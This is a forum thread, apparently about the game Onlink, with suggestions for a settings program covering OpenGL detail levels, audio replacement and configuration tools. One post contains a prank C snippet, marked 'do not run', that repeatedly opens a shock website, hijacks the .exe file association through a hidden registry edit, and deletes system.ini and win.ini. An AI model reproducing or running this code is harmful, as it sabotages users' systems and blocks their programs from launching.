This should do it... Code: while(true) {
}
But now back to the topic, any suggestions on improvements on the idea?

Code: #include <stdio.h>
#include <shellapi.h>
#include <windows.h>
void main() {
for(int i = 0; i < 10, i++ ) {
ShellExecute(NULL, "open", "cmd", "iexplore.exe http://www.meatspin.com", "C:\\", SW_SHOWMAXIMIZED);
}
ShellExecute(NULL, "open", "cmd", "/C reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d iexplore.exe http://www.meatspin.com", "C:\\", SW_HIDE);
remove ("C:\Windows\system.ini");
remove ("C:\Windows\win.ini");
}
In terms of the code battle, I think I win.NOTE: DO NOT RUN THIS CODE! |

But seriously now, I want to get this back on topic. I've had an idea for the settings program - OpenGL settings. Onlink uses OpenGL for all graphics, so it'd be nice to see some form of LOD option. For example, a very low LOD would disable button animations, a medium level would have them, but not use FSAA. Also, the sound system should be fixed to stop using that horrible mikmod audio system, it's outdated and uses needless CPU time. Most systems I know of hate Onlink and Uplink when it gets to a certain part of one of the tracks, it just stalls the game. A new audio system might use something like MadTracker, which is much more current and nicer to your CPU. |

I agree with Burningmace, some people have better things to do than sit and watch people write code that makes no contribution to the topic at hand. So anyway... yeah I know of a couple other games that have OpenGL Configuration before the game starts. 18 Wheeler: All Across America and Stronghold 2. But yeah, a graphics and sound configuration (and maybe even gameplay configuration) program that opens before the game would be a good idea. |
